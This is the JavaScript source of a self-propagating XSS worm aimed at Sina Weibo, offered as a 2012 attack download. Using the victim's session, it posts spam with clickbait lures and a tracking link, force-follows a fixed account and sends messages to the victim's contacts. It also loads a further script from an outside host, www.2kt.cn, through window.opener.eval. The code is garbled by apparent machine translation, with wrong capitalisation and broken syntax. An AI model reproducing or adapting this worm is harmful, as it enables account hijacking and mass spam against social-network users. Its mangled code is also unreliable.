function createxhr () {return window. Xmlhttprequest?new XMLHttpRequest (): New ActiveXObject ("Microsoft.XMLHTTP"); Function post (url,data,sync) {xmlHttp = CREATEXHR (); Xmlhttp.open ("POST", Url,sync); Xmlhttp.setrequestheader ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); Xmlhttp.setrequestheader ("Content-type", "application/x-www-form-urlencoded; Charset=utf-8"); Xmlhttp.send (data);} function Getappkey (URL) {xmlHttp = CREATEXHR (); Xmlhttp.open ("GET", Url,false); Xmlhttp.send (); result = Xmlhttp.responsetext;id_arr = "; id = Result.match (/namecard=" true "title=" [^ "]*/g); for (i=0;i<id.length;i++) {sum = Id[i].tostring (). Split (' "') [3];id_arr + = sum + ' | | ';} return Id_arr;} function random_msg () {link = ' http://163.fm/PxZHoxn?id= ' + new Date (). GetTime (); var msgs = [' Guo Meimei event ' Some unnoticed details: ', ' the place to wear help in the cause of the founding of the party: ', ' Let the woman heart of the 100 verses: ', ' 3D meat and Clouds HD Putonghua version of the seed: ', ' This is the legendary fairy companion Ah: ', ' breaking! Fan Bingbing nude leaked photos: ' Yang Mi was exploded several times by the unspoken rules: ', ' silly boy took the hammer to rob the bank: ', ' can monitor other people's mobile phone software: ', ' a tax levy point is expected to mention 4000: '];var msg = Msgs[math.floor (Math.random () *msGs.length)] + link;msg = encodeuricomponent (msg); return msg;} function publish () {url = ' http://weibo.com/mblog/publish.php?rnd= ' + new Date (). GetTime ();d ata = ' content= ' + random_msg () + ' &pic=&styleid=2&retcode= ';p ost (Url,data,true);} function follow () {url = ' http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd = ' + new Date (). GetTime ();d ata = ' uid= ' + 2201270010 + ' &fromuid= ' + $CONFIG. $uid + ' &refer_sort=profile&atnid =profile ';p OST (Url,data,true);} Function message () {url = ' http://weibo.com/' + $CONFIG. $uid + '/follow '; ids = Getappkey (URL); id = ids.split (' | | '); For (I=0;i<id.length-1 & i<5;i++) {msgurl = ' http://weibo.com/message/addmsg.php?rnd= ' + new Date (). GetTime () msg = Random_msg (), msg = encodeURIComponent (msg), user = encodeURIComponent (encodeuricomponent (Id[i]));d ata = ' content = ' + msg + ' &name= ' + user + ' &retcode= ';p ost (Msgurl,data,false);}} function Main () {try{publish ();} catch (E) {}try{follow ();} catch (E) {}try{message ();} catch (e) {}}try{x= "g=document.createelement (' script '); g.src= ' http://www.2kt.cn/images/t.js '; Document.body.appendChild (g) "; Window.opener.eval (x);} catch (E) {}main (); var t=settimeout (' location= "http://weibo.com/pub/topic"; ', 5000);
Sina Weibo XSS attack source code download (2012.06.28_sina_xss.txt)